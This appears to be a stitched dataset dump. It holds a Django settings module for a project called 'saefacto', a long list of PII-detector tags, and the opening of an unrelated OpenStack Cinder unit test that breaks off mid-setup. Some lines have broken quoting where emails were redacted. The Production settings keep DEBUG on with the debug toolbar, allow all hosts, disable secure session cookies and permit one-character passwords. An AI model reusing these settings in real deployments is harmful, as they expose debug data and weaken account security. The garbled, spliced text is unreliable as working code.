# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('Fábio C. Barrionuevo da Luz', dummy@email.com'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = values.DatabaseURLValue('postgres://localhost/saefacto')
########## END DATABASE CONFIGURATION
########## CACHING
# Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.
# memcacheify is what's used in Production
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
########## END CACHING
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Araguaina'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'pt-br'
LANGUAGES = (
('pt-br', u'Português do Brasil'),
('en', 'English'),
('es', u'Español'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
########## END GENERAL CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
"allauth.account.context_processors.account",
"allauth.socialaccount.context_processors.socialaccount",
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
# Your stuff: custom template context processers go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
########## END TEMPLATE CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## URL Configuration
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
########## End URL Configuration
########## AUTHENTICATION CONFIGURATION
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = "username"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
ACCOUNT_PASSWORD_MIN_LENGTH = 1
########## END AUTHENTICATION CONFIGURATION
########## Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = "users.User"
LOGIN_REDIRECT_URL = "users:redirect"
########## END Custom user app defaults
########## SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = "slugify.slugify"
########## END SLUGLIFIER
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## Your common stuff: Below this line define 3rd party libary settings
class Local(Common):
########## DEBUG
DEBUG = values.BooleanValue(True)
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
########## END INSTALLED_APPS
########## Mail settings
EMAIL_HOST = "localhost"
EMAIL_PORT = 1025
EMAIL_BACKEND = values.Value('django.core.mail.backends.console.EmailBackend')
########## End mail settings
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
#DATABASES = values.DatabaseURLValue('postgres://localhost/projetosgt')
DATABASES = values.DatabaseURLValue('sqlite:////{0}.sqlite'.format(join(BASE_DIR, 'sae_db')))
########## END DATABASE CONFIGURATION
########## django-debug-toolbar
MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TEMPLATE_CONTEXT': True,
}
########## end django-debug-toolbar
########## Your local stuff: Below this line define 3rd party libary settings
#SITETREE_MODEL_TREE = 'sitetree_smartadmin.SmartTree'
SITETREE_MODEL_TREE_ITEM = 'sitetree_smartadmin.SmartTreeItem'
class Production(Common):
########## INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
INSTALLED_APPS += ('allauth.socialaccount.providers.facebook',
'allauth.socialaccount.providers.github', )
########## END INSTALLED_APPS
########## SECRET KEY
SECRET_KEY = values.SecretValue()
########## END SECRET KEY
########## django-secure
INSTALLED_APPS += ("djangosecure", )
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)
SECURE_FRAME_DENY = values.BooleanValue(True)
SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)
SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)
SESSION_COOKIE_SECURE = values.BooleanValue(False)
SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)
SECURE_SSL_REDIRECT = values.BooleanValue(True)
########## end django-secure
########## SITE CONFIGURATION
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ["*"]
########## END SITE CONFIGURATION
INSTALLED_APPS += ("gunicorn", )
########## STORAGE CONFIGURATION
# See: http://django-storages.readthedocs.org/en/latest/index.html
INSTALLED_APPS += (
'storages',
)
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = values.SecretValue()
AWS_SECRET_ACCESS_KEY = values.SecretValue()
AWS_STORAGE_BUCKET_NAME = values.SecretValue()
AWS_AUTO_CREATE_BUCKET = True
AWS_QUERYSTRING_AUTH = False
# see: https://github.com/antonagestam/collectfast
AWS_PRELOAD_METADATA = True
INSTALLED_APPS += ("collectfast", )
# AWS cache settings, don't change unless you know what you're doing:
AWS_EXPIREY = 60 * 60 * 24 * 7
AWS_HEADERS = {
'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (AWS_EXPIREY,
AWS_EXPIREY)
}
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
########## END STORAGE CONFIGURATION
########## EMAIL
DEFAULT_FROM_EMAIL = values.Value(
'saefacto dummy@email.com')
EMAIL_HOST = values.Value('smtp.sendgrid.com')
EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="", environ_name="SENDGRID_PASSWORD")
EMAIL_HOST_USER = values.SecretValue(environ_prefix="", environ_name="SENDGRID_USERNAME")
EMAIL_PORT = values.IntegerValue(587, environ_prefix="", environ_name="EMAIL_PORT")
EMAIL_SUBJECT_PREFIX = values.Value('[saefacto] ', environ_name="EMAIL_SUBJECT_PREFIX")
EMAIL_USE_TLS = True
SERVER_EMAIL = EMAIL_HOST_USER
########## END EMAIL
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
########## END TEMPLATE CONFIGURATION
########## CACHING
# Only do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.
try:
# See: https://github.com/rdegges/django-heroku-memcacheify
from memcacheify import memcacheify
CACHES = memcacheify()
except ImportError:
CACHES = values.CacheURLValue(default="memcached://127.0.0.1:11211")
########## END CACHING
########## Your production stuff: Below this line define 3rd party libary settings
########## DEBUG
DEBUG = values.BooleanValue(True)
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## django-debug-toolbar
MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': ['debug_toolbar.panels.redirects.RedirectsPanel'],
'SHOW_TEMPLATE_CONTEXT': True,
}
########## end django-debug-toolbar
#######################################################################################
# hack terrivelmente feio para fazer o Pycharm identificar as bibliotecas
# o codigo abaixo nunca sera executado
if 1 == 2:
INSTALLED_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
'south', # Database migration helpers:
'crispy_forms', # Form layouts
'avatar', # for user avatars
'sitetree',
'sitetree_smartadmin',
'django_user_agents',
'statici18n', # javascript
'users', # custom users app
'core',
'main',
# Needs to come last for now because of a weird edge case between
# South and allauth
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
########## END APP CONFIGURATION
########## MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## DEBUG
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
# In production, this is changed to a values.SecretValue() setting
SECRET_KEY = "CHANGEME!!!"
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
join(BASE_DIR, 'fixtures'),
)
########## END FIXTURE CONFIGURATION
########## EMAIL CONFIGURATION
EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend')
########## END EMAIL CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('Fábio C. Barrionuevo da Luz', dummy@email.com'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
########## END DATABASE CONFIGURATION
########## CACHING
# Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.
# memcacheify is what's used in Production
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
########## END CACHING
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Los_Angeles'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
########## END GENERAL CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
"allauth.account.context_processors.account",
"allauth.socialaccount.context_processors.socialaccount",
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
# Your stuff: custom template context processers go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
########## END TEMPLATE CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## URL Configuration
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
########## End URL Configuration
########## AUTHENTICATION CONFIGURATION
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = "username"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
########## END AUTHENTICATION CONFIGURATION
########## Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = "users.User"
LOGIN_REDIRECT_URL = "users:redirect"
########## END Custom user app defaults
########## SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = "slugify.slugify"
########## END SLUGLIFIER
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## Your common stuff: Below this line define 3rd party libary settings
| 24,139 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application'], ['IP_ADDRESS', '127.0.0.1'], ['URL', "https://s3.amazonaws.com/%s/'"], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application'], ['PERSON', 'https://docs.djangoproject.com/en/dev/topics/settings/'], ['LOCATION', 'django.contrib.messages'], ['PERSON', 'LOCAL_APPS'], ['LOCATION', 'South'], ['PERSON', 'AuthenticationMiddleware'], ['PERSON', 'XFrameOptionsMiddleware'], ['NRP', 'SECRET_KEY'], ['PERSON', "Fábio C. Barrionuevo da Luz'"], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'LocMemCache'], ['LOCATION', 'CRISPY_TEMPLATE_PACK'], ['PERSON', 'MEDIA_ROOT'], ['URL', 'config.ws'], ['PERSON', 'EMAIL_PORT'], ['LOCATION', 'projetosgt'], ['PERSON', 'sae_db'], ['PERSON', 'INTERCEPT_REDIRECTS'], ['PERSON', 'SITETREE_MODEL_TREE_ITEM'], ['PERSON', 'SmartTreeItem'], ['NRP', 'SECRET_KEY'], ['DATE_TIME', 'this to 60 seconds'], ['NRP', 'SECURE_CONTENT_TYPE_NOSNIFF'], ['LOCATION', 'AWS_SECRET_ACCESS_KEY'], ['PERSON', 'AWS_STORAGE_BUCKET_NAME'], ['LOCATION', 'https://s3.amazonaws.com/%s/'], ['PERSON', 'EMAIL_PORT'], ['PERSON', 'SERVER_EMAIL = EMAIL_HOST_USER'], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'terrivelmente feio para fazer o Pycharm'], ['LOCATION', 'django.contrib.messages'], ['LOCATION', 'South'], ['PERSON', 'AuthenticationMiddleware'], ['PERSON', 'XFrameOptionsMiddleware'], ['NRP', 'SECRET_KEY'], ['PERSON', "Fábio C. Barrionuevo da Luz'"], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'LocMemCache'], ['LOCATION', 'CRISPY_TEMPLATE_PACK'], ['PERSON', 'MEDIA_ROOT'], ['URL', 'config.ws'], ['URL', 'https://docs.djangoproject.com/en/dev/topics/settings/'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#secret-key'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#admins'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#managers'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#time-zone'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#language-code'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#site-id'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-tz'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#logging'], ['URL', 'http://docs.djangoproject.com/en/dev/topics/logging'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts'], ['URL', 'http://django-storages.readthedocs.org/en/latest/index.html'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'https://github.com/antonagestam/collectfast'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'https://github.com/rdegges/django-heroku-memcacheify'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#secret-key'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#admins'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#managers'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#time-zone'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#language-code'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#site-id'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-tz'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#logging'], ['URL', 'http://docs.djangoproject.com/en/dev/topics/logging'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'CallingFormat.SU'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.co'], ['URL', 'django.contrib.se'], ['URL', 'django.contrib.si'], ['URL', 'django.contrib.me'], ['URL', 'django.contrib.st'], ['URL', 'django.contrib.hu'], ['URL', 'django.contrib.ad'], ['URL', 'django.contrib.ad'], ['URL', 'allauth.ac'], ['URL', 'allauth.so'], ['URL', 'django.contrib.sessions.middleware.Se'], ['URL', 'django.middleware.common.Com'], ['URL', 'django.contrib.auth.middleware.Au'], ['URL', 'django.contrib.messages.middleware.Me'], ['URL', 'django.middleware.cl'], ['URL', 'agents.middleware.Us'], ['URL', 'values.Bo'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.sm'], ['URL', 'email.com'], ['URL', 'django.core.cache.ba'], ['URL', 'django.contrib.auth.co'], ['URL', 'processors.au'], ['URL', 'allauth.account.co'], ['URL', 'processors.ac'], ['URL', 'allauth.socialaccount.co'], ['URL', 'processors.so'], ['URL', 'django.core.co'], ['URL', 'processors.de'], ['URL', 'django.core.co'], ['URL', 'django.core.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.st'], ['URL', 'django.core.co'], ['URL', 'processors.tz'], ['URL', 'django.contrib.messages.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.re'], ['URL', 'django.template.loaders.fi'], ['URL', 'os.pa'], ['URL', 'django.contrib.staticfiles.finders.Fi'], ['URL', 'django.contrib.staticfiles.fi'], ['URL', 'django.contrib.auth.backends.Mo'], ['URL', 'allauth.account.au'], ['URL', 'backends.Au'], ['URL', 'users.Us'], ['URL', 'slugify.sl'], ['URL', 'django.utils.log.Re'], ['URL', 'django.utils.log.Ad'], ['URL', 'django.re'], ['URL', 'values.Bo'], ['URL', 'Common.IN'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.co'], ['URL', 'toolbar.middleware.De'], ['URL', 'smartadmin.Sm'], ['URL', 'smartadmin.Sm'], ['URL', 'Common.IN'], ['URL', 'allauth.socialaccount.pro'], ['URL', 'allauth.socialaccount.providers.gi'], ['URL', 'values.Se'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'storages.ba'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'email.com'], ['URL', 'values.Va'], ['URL', 'smtp.sendgrid.com'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Int'], ['URL', 'values.Va'], ['URL', 'django.template.loaders.ca'], ['URL', 'django.template.loaders.fi'], ['URL', 'values.Ca'], ['URL', 'values.Bo'], ['URL', 'toolbar.middleware.De'], ['URL', 'toolbar.panels.redirects.Red'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.co'], ['URL', 'django.contrib.se'], ['URL', 'django.contrib.si'], ['URL', 'django.contrib.me'], ['URL', 'django.contrib.st'], ['URL', 'django.contrib.hu'], ['URL', 'django.contrib.ad'], ['URL', 'allauth.ac'], ['URL', 'allauth.so'], ['URL', 'django.contrib.sessions.middleware.Se'], ['URL', 'django.middleware.common.Com'], ['URL', 'django.contrib.auth.middleware.Au'], ['URL', 'django.contrib.messages.middleware.Me'], ['URL', 'django.middleware.cl'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.sm'], ['URL', 'email.com'], ['URL', 'django.core.cache.ba'], ['URL', 'django.contrib.auth.co'], ['URL', 'processors.au'], ['URL', 'allauth.account.co'], ['URL', 'processors.ac'], ['URL', 'allauth.socialaccount.co'], ['URL', 'processors.so'], ['URL', 'django.core.co'], ['URL', 'processors.de'], ['URL', 'django.core.co'], ['URL', 'django.core.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.st'], ['URL', 'django.core.co'], ['URL', 'processors.tz'], ['URL', 'django.contrib.messages.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.re'], ['URL', 'django.template.loaders.fi'], ['URL', 'os.pa'], ['URL', 'django.contrib.staticfiles.finders.Fi'], ['URL', 'django.contrib.staticfiles.fi'], ['URL', 'django.contrib.auth.backends.Mo'], ['URL', 'allauth.account.au'], ['URL', 'backends.Au'], ['URL', 'users.Us'], ['URL', 'slugify.sl'], ['URL', 'django.utils.log.Re'], ['URL', 'django.utils.log.Ad'], ['URL', 'django.re']] |
72 | # Copyright (C) 2015 Pure Storage, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from datetime import timedelta
import ddt
import mock
from oslo_utils import timeutils
from cinder import context as ctxt
from cinder.db.sqlalchemy import models
from cinder.image import cache as image_cache
from cinder import objects
from cinder import test
from cinder.tests.unit import fake_constants as fake
@ddt.ddt
class ImageVolumeCacheTestCase(test.TestCase):
def setUp(self):
super(ImageVolumeCacheTestCase, self).setUp()
self.mock_db = mock.Mock()
self.mock_volume_api = mock.Mock()
self.context = ctxt.get_admin_context()
self.volume = models.Volume()
